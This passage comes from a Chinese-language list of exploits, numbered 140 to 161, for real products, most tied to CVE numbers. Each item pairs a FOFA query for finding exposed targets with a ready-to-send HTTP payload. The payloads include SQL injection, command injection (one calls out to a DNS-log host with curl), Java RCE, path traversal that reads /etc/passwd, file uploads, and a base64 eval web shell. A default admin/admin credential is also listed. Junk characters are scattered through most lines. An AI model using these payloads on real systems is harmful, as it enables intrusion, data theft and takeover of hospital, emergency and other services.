# n+ [* a% q6 kGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.14 C. r4 B( A1 B& E
Host: x.x.x.x
! d- ^7 P. ]: R7 B0 S$ QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: ?+ [1 `8 q/ z4 |% } ^. t% {) rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
l j* P! w x o+ R4 G2 {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 x# v( E/ l, G& V6 T' n9 u
Accept-Encoding: gzip, deflate, br4 }" ^# K+ z' @5 K- M
Connection: close3 f% j& q# H2 D7 J5 f
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk) d+ M$ ?0 @6 x: @& |$ H9 [ m5 A/ V
Upgrade-Insecure-Requests: 1
+ ^3 _* M/ u4 I/ J1 `! d/ n
, O; u/ H1 H9 g' [* @/ |7 D2 j: v0 C, ~: v8 }6 N# o
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
" X6 ~, |3 R! E- u% xCVE-2024-25666 @- b, o \8 H# d8 l! w: f; O
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
0 {$ Z* e" }' n/ \* uGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1( _3 P8 F" D) B% C" h! N& Q
Host: x.x.x.x
6 Z" N, ?" r; y: KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0/ s3 I% U" Y: D% l) [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" g0 p! o+ v9 G) V6 f9 H* e& M) H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 z* T/ c( U' C/ o* M% q& \! r' n
Accept-Encoding: gzip, deflate, br
9 x- o4 ~7 J: @% DConnection: close1 I/ o7 Q8 y! l3 G3 c& R n- s5 y
Cookie: authcode=h8g9, Z: e/ M" _+ {$ z7 z
Upgrade-Insecure-Requests: 1
% k, j' h- A3 U% G4 F$ _8 t) A
( Z: `6 t& B" f( y4 x* b. ^7 c+ I
" k0 j. k4 M% G* R141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
O, j9 q3 |+ d! ?) u- BFOFA:body="指挥调度管理平台"( C& Y% H9 k3 @- K/ j2 T1 o% r
POST /app/ext/ajax_users.php HTTP/1.1$ g! D$ V2 o6 C4 ^7 s
Host: your-ip. \ l, m$ o: N) h$ z8 r
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
8 h% N# G% q; uContent-Type: application/x-www-form-urlencoded
" H) c3 T. Y8 [; {7 N9 Q3 n) X! f# {* E0 d0 r/ F- X
; }0 A# F9 E% E9 l- a# Mdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
1 {/ N3 K& g: z& K$ E5 H
- x) a h: T- a% D/ W7 M* U1 ?1 E' f5 |
142. CMSV6车辆监控平台系统中存在弱密码0 A$ P9 p u) } J& c
CVE-2024-29666
$ L! b4 x0 g' y2 Q& M; E3 IFOFA:body="/808gps/"
& W0 n, c; y7 p9 }. g. ^" I' w8 k& Badmin/admin
6 _, D7 o. _( N& ^0 I" D% S9 D143. Netis WF2780 v2.1.40144 远程命令执行2 J! |/ _; ~: I7 b! m! T$ K) C2 h% L
CVE-2024-25850
) ~ L) ?8 @2 w& P' |! qFOFA:title='AP setup' && header='netis'
0 d' U% Q, x. z' b& RPAYLOAD2 @ G0 A4 J( h/ C' H0 T. s- Z. j
* u/ E. b/ ?2 a; V! [% ] |144. D-Link nas_sharing.cgi 命令注入
8 v8 L) H" r+ pFOFA:app="D_Link-DNS-ShareCenter"+ Z1 C1 |$ |9 s. ~' O- D
system参数用于传要执行的命令* b' x/ M& I1 R& L3 g" A8 m: R
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
; @) X- r* m, uHost: x.x.x.x; A& b7 W( D( K
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.09 K) u2 M% J, `$ _; ~
Connection: close/ j/ }/ C6 \# j% A1 o8 i6 z, l1 l
Accept: */*/ T D* \$ X& N0 o i) f
Accept-Language: en6 n4 ]7 [7 c* ?0 Z% F: I5 r
Accept-Encoding: gzip
% Z2 l- h% C% u. H6 z1 K( r0 q4 p# v5 ^, O0 v
; s1 b$ t- U7 P! A) M% Q
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入8 R# K6 U: w) z' S& {
CVE-2024-3400
- p, R9 w$ Y: [. | t/ u3 UFOFA:icon_hash="-631559155"7 h0 O2 G3 {. a: L
GET /global-protect/login.esp HTTP/1.19 k! Y0 }4 c1 P" a
Host: 192.168.30.112:1005
$ X, E. a E! Z2 X# i3 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
: L# |$ g: ^4 n* iConnection: close
9 g1 \' H* [7 W5 W0 S$ wCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;( k) K/ p; E- k- ^9 {( O9 H
Accept-Encoding: gzip
. _7 H% h$ s: t9 w6 A, T5 w
$ F' q3 J, x' k) e' U! ]% m/ l" X& H; ~6 Y, @1 y! T
146. MajorDoMo thumb.php 未授权远程代码执行
0 @8 h. p: Z$ r% D1 pCNVD-2024-021757 e+ Y, w n5 Q2 V6 O7 E" D
FOFA:app="MajordomoSL"% q; q4 T7 _; ~) U- M9 @. \
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
' A* }6 ~3 Q9 f) D: D% E; YHost: x.x.x.x
& Z, D! W# ?$ ~& j# c/ O1 r3 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
4 |& R1 n2 [/ h* P2 I1 b2 t1 @! p$ NAccept-Charset: utf-8
0 j" {" |4 b2 ?3 |4 @: w) J& vAccept-Encoding: gzip, deflate
) Z2 c: k' X1 |, O( X5 h+ s0 JConnection: close) m) g2 [$ B+ |* e, R( u h% |
: T. y; ?8 }, e4 }& k2 ~* P" ?' C! E8 v% }
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历' F) K. `& S2 M+ `5 }
CVE-2024-323993 Z8 r$ Q0 V$ C" }6 H
FOFA:body="RaidenMAILD"9 q( L2 G2 ~7 o1 V/ l
GET /webeditor/../../../windows/win.ini HTTP/1.17 y% U- v# W/ q* }: b) s1 @
Host: 127.0.0.1:81! \* o7 i' ~; a) I; }& ~% v+ v& i
Cache-Control: max-age=0
8 s3 d4 d9 x2 g: IConnection: close* \ S* r0 V; z/ y3 P/ `
2 r9 F: f' Z: v/ T9 x/ _
3 _/ c3 P: a' B
148. CrushFTP 认证绕过模板注入: C5 p0 [3 [0 x# D3 m! F. w
CVE-2024-40405 b( c% T( q2 P A( J. V, N
FOFA:body="CrushFTP"# |4 x4 B7 X4 @4 l0 P
PAYLOAD
* R3 N$ ^& v" x- i( y1 Z* A& D. ]" V
149. AJ-Report开源数据大屏存在远程命令执行
( t# V6 M% Z5 b% l8 lFOFA:title="AJ-Report"
% l: C+ I% B) O S5 M
& d5 J+ k. p7 K. }5 _; _POST /dataSetParam/verification;swagger-ui/ HTTP/1.1( P9 ?! N' E+ z) ^: L
Host: x.x.x.x
f5 m; a; `+ JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( E! X2 V/ _- G2 z3 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ x+ T" a9 ^; K/ D# w. d$ m
Accept-Encoding: gzip, deflate, br" R- r& |+ R( P2 z2 L2 i' T
Accept-Language: zh-CN,zh;q=0.9( v# U, k- b3 h9 \2 h8 Q/ c6 F. a
Content-Type: application/json;charset=UTF-8
( h1 _. j& \/ y2 \" @1 t; EConnection: close
5 _; O0 c6 Z1 a7 l, q( v {! b) M% S. K# n( `
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}: _% N _4 z, b- R; b# Q0 t. d5 d
2 E. b, i4 L0 v m0 r. A m
150. AJ-Report 1.4.0 认证绕过与远程代码执行! B/ G: V# e w. S6 `. b0 d, \
FOFA:title="AJ-Report"
; ]; M7 x2 ]9 f/ x4 i+ m9 l) L1 ?POST /dataSetParam/verification;swagger-ui/ HTTP/1.15 D7 Q! a! \# f4 D& A) p
Host: x.x.x.x
4 J4 B; H, i& Y% rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. Q/ ]& e8 g* b9 f. K3 A$ u% K0 OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! k$ A% d2 F5 I9 q( C; v3 ^, q3 w
Accept-Encoding: gzip, deflate, br
. p; P. D) s1 V( p7 H, IAccept-Language: zh-CN,zh;q=0.99 N9 f* X: O8 B9 j) N
Content-Type: application/json;charset=UTF-85 p3 i! F" N# I4 v3 W# Y9 `' g- k
Connection: close
$ n$ ~3 `6 T9 T0 aContent-Length: 339
o, D) d/ ?/ d& |
$ E) S. t8 M$ E% ~1 Z0 A0 K0 U{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
* p" s& s8 s' ]/ Z" C: M% a& n9 S
. c2 V6 x) A; S, C, k, i u5 L7 l8 T$ T4 W0 {: w
151. AJ-Report 1.4.1 pageList sql注入
1 _ H7 a& q$ {; C& w9 Z6 kFOFA:title="AJ-Report"" D0 n1 c2 Y2 A+ X0 v6 J7 L
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
0 S. z- ?: t' H- y$ o8 G5 _Host: x.x.x.x
7 e/ l8 F) x/ B/ P" O4 F) HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 z4 f7 D2 E9 w$ b
Connection: close
U3 t0 Q" f6 `6 P3 ~8 t7 AAccept-Encoding: gzip
- `; L+ c- g) y% r# l9 Q, e/ s" b* B5 y" T9 R1 \
) G. p& v4 c! j% X- X! [152. Progress Kemp LoadMaster 远程命令执行
# i; P S! f- [: mCVE-2024-1212 V$ ]. j* b, n7 q$ Q
LoadMaster <= 7.2.59.2 (GA)
$ ?& G1 y( x1 @! sLoadMaster<=7.2.54.8 (LTSF)
& s0 o, \* H) q4 V, S- d5 J! [LoadMaster <= 7.2.48.10 (LTS)
* \' N' S- x$ e0 n6 e1 p7 qFOFA:body="LoadMaster"1 a8 D" }+ x% v
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
' ]$ `0 q+ r# `" DGET /access/set?param=enableapi&value=1 HTTP/1.1 p- y- q$ z6 v! N* @
Host: x.x.x.x/ p; E& `% v, S m* L4 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1% R$ w1 L& ~; X) ]' ^! }& R! q
Connection: close" T& Y' U9 ?* _7 g2 M$ P
Accept: */*; H2 Y0 h5 D. L P8 f
Accept-Language: en7 a' b- a/ m t' S: n
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=- C2 h# }2 J* s% E. ?% M
Accept-Encoding: gzip
3 q* t! p) B" f* e! P( W
, b0 H# O9 ^. {( T, L: T- Z4 Q4 M+ `9 X) b$ r/ Y7 t2 ?
153. gradio任意文件读取( `% U, \. C; N: ?, p6 D- N
CVE-2024-1561FOFA:body="__gradio_mode__"
- D0 l2 a3 ?5 L. h0 v- j- r7 t第一步,请求/config文件获取componets的id
0 w5 J, I; l/ z. F& w5 c, Yhttp://x.x.x.x/config
) s0 C8 @' v) V3 e! t; Q
i" `1 V; Z; w5 m9 m% `+ u2 _! k' F0 T7 d
第二步,将/etc/passwd的内容写入到一个临时文件+ R4 I2 e/ O% l* y! l& @0 S
POST /component_server HTTP/1.1) z" ^/ v" z0 ~/ }2 \" U
Host: x.x.x.x
L' W3 a& A1 d, V9 L3 d, yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
+ v, r1 y! B; \5 b. WConnection: close8 t' E. C' K6 G; y
Content-Length: 1158 j% s X5 q7 I
Content-Type: application/json
; o; w# x! `: J2 ?* k" e' nAccept-Encoding: gzip# h/ b% a4 s. g% C# Z' a. a# A
: q3 a9 \0 e/ k( ~/ q* }6 B0 l
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}! ?; P3 e! S4 {+ X6 k
! @7 j$ V# H( i: ~
- m# I( ^9 ^4 |! p# w3 {) H' j第三步访问
' a! `3 \1 P7 N& ]1 r) ^http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd+ J) U& D8 U$ B6 n' u
' x- i, V( y. }4 k/ `7 q3 t- Y- A. E% Q1 a4 @
154. 天维尔消防救援作战调度平台 SQL注入
7 X! @7 j$ n- J2 V. MCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
+ f! y$ Y. u; EPOST /twms-service-mfs/mfsNotice/page HTTP/1.1! C; f( R% K& {" J$ D# H' ^5 _
Host: x.x.x.x
) l* S+ m4 B+ K7 M7 g, P$ S* TContent-Length: 106- F* R5 C. S4 {3 Y" f, D+ J
Cache-Control: max-age=0
3 |1 x1 G- ~! WUpgrade-Insecure-Requests: 1
' h8 t C$ u% t0 c1 G# LOrigin: http://x.x.x.x
0 y8 X7 L5 Z4 b2 z8 `3 tContent-Type: application/json d# H: V$ J7 b7 P+ v$ J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
: O2 V: j8 {. J# g. OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 D: i! ~) i3 h+ D, G7 C& e
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page6 S: y9 V1 f8 ^: n7 d: t u
Accept-Encoding: gzip, deflate
6 p/ o4 D, R p0 }Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7# b, Z6 a5 ~, I
Connection: close
: a$ O+ n. T# P4 b# Y2 t, s1 o
* u& r/ G" y' Z3 ]{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
1 V- I+ R' }2 @: }. H0 J+ {3 A) @. F! S- b p" U
5 y A6 F3 z- Y7 l) F! \% O$ Q7 Y
155. 六零导航页 file.php 任意文件上传
7 t6 x) |+ f4 w) FCVE-2024-34982& t& U. y5 H7 [9 Y- Z8 g
FOFA:title=="上网导航 - LyLme Spage"
# c2 }: j/ n: q% p/ FPOST /include/file.php HTTP/1.1. h& z6 z" o) r. e5 k
Host: x.x.x.x2 x/ J* W) k/ W& y9 n; [5 x. q [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
C+ @) R% ~# ~4 C. Z; I4 yConnection: close" B' j: P3 v/ H3 {( {4 W' \
Content-Length: 232& f! d# i/ T/ V# A% Q* P/ V1 A
Accept: application/json, text/javascript, */*; q=0.011 o6 q' V! n+ C9 _: m3 r0 Q3 o
Accept-Encoding: gzip, deflate, br
, V0 v5 w) T5 B% @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' l! s- w' e) G# L3 l5 C1 EContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
Y' o( G/ Q; u- r6 qX-Requested-With: XMLHttpRequest
! c+ E* v! z, k) C7 Y6 k6 F! N+ ^& U: }% T! @( I* ]( j. w7 ]$ W
-----------------------------qttl7vemrsold314zg0f2 \* X) G( u' ^. G, F8 w5 B
Content-Disposition: form-data; name="file"; filename="test.php"
6 I: N5 G( g: R! u( }3 qContent-Type: image/png
- N) a s6 V0 L! v# C% U
9 B1 l3 E7 L. O! `+ L0 n<?php phpinfo();unlink(__FILE__);?>
; B2 t) R) i) n9 G& h. D; s-----------------------------qttl7vemrsold314zg0f--2 k% e1 i) `& G& P# |7 Y8 _
+ R0 @7 l; ], R( V; b8 `
) E. s1 r+ d$ Z( w4 n; V' d
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
5 v( c; B1 C% M7 k. ?5 \9 ^& c9 ], K3 K$ t
156. TBK DVR-4104/DVR-4216 操作系统命令注入
& q V- W1 K* R& J3 ^; MCVE-2024-3721& i$ p+ t! F5 N$ u! P$ s7 t
FOFA:"Location: /login.rsp"
6 a$ O: q, {# P' L·TBK DVR-4104
V0 Z$ b: C% B* @+ c2 \& p·TBK DVR-4216! x* M% P4 ~* W( [# o% u. V
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1" `9 L# r4 r9 @5 @6 B4 h* V% ~
, o6 T, @# U3 S. a; K8 K
w5 q; @5 W6 t3 V1 r+ n; |9 |( ^
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1! \/ `8 ]2 |6 j6 k1 @
Host: x.x.x.x
8 k) n6 H- o/ V8 c P& y, d. iUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 p$ ` f' U4 y5 v
Connection: close
4 T* U% B" Z' v2 [- Q1 E5 MContent-Length: 00 C, u2 d" _( x9 A2 \
Cookie: uid=1
$ w" I7 V- x$ M6 m: Z! uAccept-Encoding: gzip
+ q6 `: |! s/ V, ` X9 P1 U
6 [# g5 l8 A4 n+ Y
' y2 ?; H& D( _. _7 i- h: C157. 美特CRM upload.jsp 任意文件上传, S* b4 [& m9 v: l; L; }
CNVD-2023-06971
& \, ]' a' K0 `& `0 ]FOFA:body="/common/scripts/basic.js"
: F w4 j% X5 }' C+ A2 E5 [POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1) L& \2 G9 E4 J! S
Host: x.x.x.x7 ^* o& v4 H& V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36$ {9 K9 f% |9 o* a7 n
Content-Length: 709
! w4 g/ [; Z/ C) Q# iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 J7 L8 Q- Z1 j! m0 l
Accept-Encoding: gzip, deflate
1 d7 Q! ~& S0 t* }1 FAccept-Language: zh-CN,zh;q=0.9
: C: H! F6 \8 |0 M4 JCache-Control: max-age=0
0 {# Y3 [& \( q& WConnection: close3 s3 p4 S# d. y9 P& G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
5 r9 i/ E0 C2 B- Z/ ]Upgrade-Insecure-Requests: 1/ f0 U l9 T0 r9 k& j ~
5 \6 E# K4 P; U------WebKitFormBoundary1imovELzPsfzp5dN6 z0 Z5 Y4 S! c
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"; J! D y8 H' R0 g4 L
Content-Type: application/octet-stream: m3 j8 I6 X+ q, K
! K6 N; ]) l+ n6 q/ b1 K+ I: U
nyhelxrutzwhrsvsrafb+ ?' E2 I9 D9 R" J: u5 B
------WebKitFormBoundary1imovELzPsfzp5dN0 G; p" e+ P' L- c& e
Content-Disposition: form-data; name="key"
x/ i: @. o7 T$ Z" P& B1 v" I- T
null
2 K" x$ t X9 d6 X------WebKitFormBoundary1imovELzPsfzp5dN
% M7 P: [4 x7 h4 ]Content-Disposition: form-data; name="form"# N: D, U3 | }& D: @1 W: B7 D# ~
: O& p2 s0 ~- Qnull
/ x6 l# w* U4 B. f------WebKitFormBoundary1imovELzPsfzp5dN
% n6 }2 v/ }( m( _Content-Disposition: form-data; name="field"
6 ?. d4 }0 {7 w- m' z! M$ k# I0 N; }' Y$ `
null
8 Y7 f) m' d. g6 y& @------WebKitFormBoundary1imovELzPsfzp5dN
3 @3 B4 I' L5 c& b; o, nContent-Disposition: form-data; name="filetitile"
9 Q; G) U; N7 F a }; K) \. m( _% i Q6 |- ^7 X1 \
null
- v$ F: ^5 S( N2 D------WebKitFormBoundary1imovELzPsfzp5dN
. _) Z4 K3 }3 V$ B }+ hContent-Disposition: form-data; name="filefolder"4 i4 V0 T: P% M% w' ~3 L+ Z
7 p( c. d* c+ [/ X! C2 q
null
! o' y1 T) n8 E* f5 D------WebKitFormBoundary1imovELzPsfzp5dN--
& b, u+ i9 y8 e: K/ N6 D! _* I: {& Y, B; ^& Y- q
) a8 C( H' `2 k% O( h9 U& M$ Yhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp2 N0 E0 W1 X( ]
* E, e c3 v: Z- x" h% [" _158. Mura-CMS-processAsyncObject存在SQL注入
$ \+ S$ S+ a' A+ x' `' g+ lCVE-2024-32640
7 b; m) @+ Z6 `* K9 Q' r4 GFOFA:"Generator: Masa CMS"; V" q$ G; r8 q) J; n) Q ~# k
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
) q$ A" _ N+ QHost: {{Hostname}}
7 `, ^- i4 b- E: K5 IContent-Type: application/x-www-form-urlencoded" O& h5 T# j/ C7 m9 h& `
, V" l& B V) U$ t% w1 Z0 s
object=displayregion&contenthistid=x\'&previewid=1
' k% S! ?& Q' t/ N' N4 N2 L! D! h) u( W
0 o7 T+ h( B7 H5 q) \) K! o
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
* w6 N e4 J5 T7 P8 [FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")) Y( h) t3 U! }, r$ M$ a2 n, ]
POST /webservices/WebJobUpload.asmx HTTP/1.1
6 {7 }+ K" f9 e/ T; a; kHost: x.x.x.x
* R7 `8 P) Q6 |6 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36* ?! r- N, |- E7 w0 r6 v( Z
Content-Length: 1080
" M, @- ` N- tAccept-Encoding: gzip, deflate
8 l' u! {4 t# Y* }3 xConnection: close* e% `0 u$ [* c" g# \+ Y
Content-Type: text/xml; charset=utf-8
- b- i1 ^0 R: t2 `5 tSoapaction: "http://rainier/jobUpload"8 I' A' x$ W* }( T% n. M9 I* Z0 i
. Q8 M2 b6 z5 ]0 l" u<?xml version="1.0" encoding="utf-8"?>0 h# h6 P, s/ T5 x; X
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">1 U6 O+ b9 n, r+ D1 K# t0 h
<soap:Body>2 m! s6 ?* r0 v/ d. |. u/ o
<jobUpload xmlns="http://rainier">
7 ]. i0 b! x* P$ X) U6 A* s! F1 N5 @<vcode>1</vcode>
6 R) N9 y" q8 n4 ~3 c: W+ l<subFolder></subFolder>
6 @6 A2 w: P6 q<fileName>abcrce.asmx</fileName>
3 C5 d2 K$ W) J( C* c<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
d( t9 R% p4 W5 z# p3 }</jobUpload>
x/ u, L- o% S4 H+ r# P* V</soap:Body>
U9 O% a+ L8 S</soap:Envelope>
$ M( J7 S8 k* n6 W3 t; I/ B: c
+ @* K w4 r r; D, l( h* _/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")& K" o4 P! D1 \
& A' v: z @" \4 x4 E' H
8 y U2 t* x) d7 J5 O160. Sonatype Nexus Repository 3目录遍历与文件读取3 v# H& v4 M' X4 x4 c
CVE-2024-4956
5 j( f/ [0 G: f5 kFOFA:title="Nexus Repository Manager"% r0 W/ n' I. M
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.17 G) v4 }, x# B/ X
Host: x.x.x.x! I$ l! |8 B: _9 S5 d1 v# X
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
* d# s7 B# l" H1 ^! wConnection: close
2 P3 E5 [) I9 }4 w/ rAccept: */*# U/ D0 q+ I# d) k3 {. x
Accept-Language: en
/ }4 a& r6 g* h: r$ EAccept-Encoding: gzip
3 E+ O2 A+ U9 ]3 k1 j, t+ Q- r* S9 q& b- w
5 F2 p" \' K7 h( ^ C
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传0 P' G0 V* J/ ?7 q6 |
FOFA:body="/KT_Css/qd_defaul.css"" T Z" \0 L4 d' ~ U* m
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
2 C2 |6 x- Z$ P* ePOST /Webservice.asmx HTTP/1.1
2 O. T$ R& V# j; G. |" P w( ~& iHost: x.x.x.x
. b& Y A& O, Y6 b C$ t+ r0 r" hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.360 I8 ~: g- I2 z0 Z6 W
Connection: close
3 j5 Y* l+ _* s3 V, QContent-Length: 445* @, {2 D/ V+ j' z0 k/ E
Content-Type: text/xml9 u, ?' M$ c" m v3 O# E
Accept-Encoding: gzip1 P! n. ^( d( V/ m1 X A
" O$ p. [2 c* X& Z
<?xml version="1.0" encoding="utf-8"?>2 E8 K, Q% b/ r# [1 z1 K
<soap:Envelope xmlns:xsi="( u7 F6 Q4 O0 x/ O- a! A5 d+ y
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+ m- \7 K/ C8 U0 E% Y6 h8 {1 oxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">/ N) J1 r8 ~3 v" c3 A9 f1 N4 s
<soap:Body>. y: U0 Y5 i5 S7 Q- `4 \ Y
